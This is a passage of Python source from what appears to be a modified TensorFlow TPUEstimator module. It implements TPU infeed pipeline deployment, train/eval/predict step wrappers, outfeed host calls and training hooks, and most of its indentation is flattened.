# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope("input_pipeline_task%d" % (host_id)):
enqueue_ops_fn, captured_infeed_queue = generate_per_core_enqueue_ops_fn_for_host(
self._ctx,
self._input_fn,
self._inputs_structure_recorder,
host_device,
host_id,
)
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn
)
)
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = generate_broadcast_enqueue_ops_fn(
self._ctx, self._input_fn, self._inputs_structure_recorder, num_hosts
)
all_hooks.extend(hooks)
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT
else _wrap_computation_in_while_loop_with_stopping_signals
)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope("input_pipeline_task%d" % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx,
self._input_fn,
self._inputs_structure_recorder,
host_device,
host_id,
)
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = generate_per_host_enqueue_ops_fn_for_host(
self._ctx,
self._input_fn,
self._inputs_structure_recorder,
self._batch_axis,
host_device,
host_id,
)
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should always be safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT
else _wrap_computation_in_while_loop_with_stopping_signals
)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn)
)
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is the dtypes and shapes. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
should error out to give users a better error message. But if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = (
"Input pipeline contains one or more QueueRunners. "
"It could be slow and not scalable. Please consider "
"converting your input pipeline to use `tf.data` instead (see "
"https://www.tensorflow.org/guide/datasets for "
"instructions."
)
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
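# A minimal sketch (plain Python values stand in for Tensors) of the
# flatten/unflatten round trip that InputsStructureRecorder performs above via
# `data_nest.flatten` and `data_nest.pack_sequence_as`. The `_example_*` name
# is invented for illustration only.
def _example_flatten_unflatten_roundtrip():
    structure = {"features": {"x": 1, "y": 2}, "labels": 3}
    flat = data_nest.flatten(structure)  # dict keys are flattened in sorted order
    restored = data_nest.pack_sequence_as(structure, flat)
    return flat, restored  # flat == [1, 2, 3]; restored mirrors `structure`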
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent, and
performs the necessary checks and mutations required by TPU training and
evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, train_cache_fn, eval_cache_fn, config, params, ctx):
self._model_fn = model_fn
self._train_cache_fn = train_cache_fn
self._eval_cache_fn = eval_cache_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss, *cache):
"""Training step function for use inside a while loop."""
if not self._params.get("track_mean", False):
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
# Consume the current cache
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels, cache=cache)
)
# Retrieve the new returned cache
"""
`cache` consists of a list of tensors, potentially empty (of length 0)
"""
cache = estimator_spec.cache
new_loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (
isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
) # pylint: disable=protected-access
and estimator_spec.host_call is not None
):
host_call.record({"host_call": estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
if self._params.get("track_mean", False):
loss = tensorflow.stop_gradient(loss)
return [math_ops.add(loss, new_loss)] + cache
else:
return [array_ops.identity(new_loss)] + cache
return (train_step, host_call, captured_scaffold_fn, captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss, *cache):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
# Consume the current cache
tpu_estimator_spec = self._call_model_fn(features, labels, cache=cache)
if not isinstance(
tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
raise RuntimeError(
"estimator_spec used by TPU evaluation must have type"
"`TPUEstimatorSpec`. Got {}".format(type(tpu_estimator_spec))
)
# Retrieve the new returned cache
cache = tpu_estimator_spec.cache
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record["eval_metrics"] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record["host_call"] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return [math_ops.add(total_loss, loss)] + cache
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, "Internal Error: `signals` is missing."
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False
)
if not isinstance(
tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
raise RuntimeError(
"estimator_spec used by TPU prediction must have type"
"`TPUEstimatorSpec`. Got {}".format(type(tpu_estimator_spec))
)
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record["predictions"] = [identity_fn, tpu_estimator_spec.predictions]
to_record["signals"] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record["host_call"] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn, captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Add validation for the prediction dictionary.
# TODO(xiejw): Add support for a single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError("TPUEstimatorSpec.predictions must be dict of Tensors.")
for (key, tensor) in predictions.items():
if tensor.shape[0].value is None:
raise ValueError(
"The tensor with key ({}) in TPUEstimatorSpec.predictions has "
"dynamic shape (should be static). Tensor: {}".format(key, tensor)
)
return predictions
def _validate_model_features_and_labels(self, features, labels, is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is one with:
- Type: Tensor or a dictionary of Tensors
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if not isinstance(obj, ops.Tensor) and not isinstance(obj, dict):
raise TypeError(
"The {} to the model returned by input_fn must be either a Tensor "
"or a dictionary of Tensors. {}: {}".format(obj_name, obj_name, obj)
)
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
"The {} to the model returned by input_fn must have static shape."
" Tensor: {}".format(obj_name, obj)
)
else:
for (key, value) in obj.items():
flattened_tensors = data_nest.flatten(value)
for tensor in flattened_tensors:
if not tensor.get_shape().is_fully_defined():
raise ValueError(
"The {} to the model returned by input_fn must have static "
"shape. Key: '{}', Tensor: {}".format(
obj_name, key, tensor
)
)
validate(features, "features")
if labels is not None:
validate(labels, "labels")
def _call_model_fn(self, features, labels, cache=None, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Make deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if "labels" in model_fn_args:
kwargs["labels"] = labels
elif labels is not None:
raise ValueError(
"model_fn does not take labels, but input_fn returns labels."
)
if "mode" in model_fn_args:
kwargs["mode"] = self._ctx.mode
if "config" in model_fn_args:
kwargs["config"] = config
if "params" in model_fn_args:
kwargs["params"] = params
if cache is not None:
params["cache"] = cache
if "params" not in model_fn_args:
raise ValueError(
"model_fn ({}) does not include params argument, "
"required by TPUEstimator to pass batch size as "
"params['batch_size']".format(self._model_fn)
)
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False
)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if running_on_cpu and isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
return estimator_spec
err_msg = "{} returned by EstimatorSpec is not supported in TPUEstimator."
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format("training_chief_hooks")
+ " If you want to pass training hooks, please pass via training_hooks."
)
if estimator_spec.scaffold:
logging.warning(
"EstimatorSpec.Scaffold is ignored by TPU train/eval. "
"Please use TPUEstimatorSpec."
)
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError("{} should be tuple or list".format(name))
if len(host_call) != 2:
raise ValueError("{} should have two elements.".format(name))
if not callable(host_call[0]):
raise TypeError("{}[0] should be callable.".format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError("{}[1] should be tuple or list, or dict.".format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
"In TPUEstimatorSpec.{}, length of tensors {} does not match "
"method args of the function, which takes {}.".format(
name, len(host_call[1]), len(fn_args)
)
)
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
"Exception while calling %s: %s. It is likely the tensors "
"(%s[1]) do not match the "
"function's arguments",
name,
e,
name,
)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn,
which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id,
)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[
pos : pos + len(self._tensors[name])
]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on a single-host TPU system. So,
# place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
"All tensors outfed from TPU should preserve batch size "
"dimension, but got scalar {}".format(dequeue_ops[i][0])
)
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
"Exception while calling %s: %s. It is likely the tensors "
"(%s[1]) do not match the "
"function's arguments",
name,
e,
name,
)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
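# --- Illustrative sketch (not used by this module) -------------------------
# A minimal example of the `(host_fn, tensors)` pair that
# `_OutfeedHostCall.validate`/`record` expect. The helper name
# `_example_host_call_spec` and the idea of logging a loss summary are
# assumptions for illustration only.
def _example_host_call_spec(loss, global_step):
  """Builds a host_call: a callable plus a dict of batch-major tensors."""

  def _host_fn(loss, global_step):
    # Runs on the host CPU; each argument is the concatenation of the
    # per-shard tensors along dimension 0.
    with contrib_summary.create_file_writer('/tmp/host_call_demo').as_default():
      with contrib_summary.always_record_summaries():
        contrib_summary.scalar('loss', loss[0], step=global_step[0])
        return contrib_summary.all_summary_ops()

  # Dict keys must match the argument names of `_host_fn`, and every tensor
  # must keep a batch dimension (scalars are rejected by create_tpu_hostcall).
  return (_host_fn, {
      'loss': array_ops.reshape(loss, [1]),
      'global_step': array_ops.reshape(global_step, [1]),
  })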
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(
self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None,
):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer,
)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(
value=[
Summary.Value(
tag="global_step/sec", simple_value=global_step_per_sec
)
]
)
example_summary = Summary(
value=[Summary.Value(tag="examples/sec", simple_value=examples_per_sec)]
)
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info("global_step/sec: %g", global_step_per_sec)
logging.info("examples/sec: %g", examples_per_sec)
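# Illustrative sketch only (nothing in this module calls it): attaching
# ExamplesPerSecondHook to a hypothetical estimator's train() call. The
# `my_estimator`/`my_input_fn` arguments and the batch size of 1024 are
# assumptions for the example.
def _example_examples_per_second_usage(my_estimator, my_input_fn):
  hook = ExamplesPerSecondHook(
      batch_size=1024,                     # global batch size; scales steps/sec
      every_n_steps=100,                   # log every 100 global steps
      output_dir=my_estimator.model_dir)   # also write the summaries here
  my_estimator.train(input_fn=my_input_fn, max_steps=10000, hooks=[hook])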
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Changes the SIGINT (CTRL+C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify the
global batch size in the constructor, and then get the batch size for each
shard in `input_fn` and `model_fn` via `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select the appropriate metagraph to
load. Before running the graph on TPU, the TPU system needs to be
initialized. If TensorFlow Serving model-server is used, this is done
automatically. If not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = (
export_output_lib.ClassificationOutput(classes=classes))
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(
self,
model_fn=None,
train_cache_fn=None,
eval_cache_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
warm_start_from=None,
):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the model_fn.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit, but eval_on_tpu can
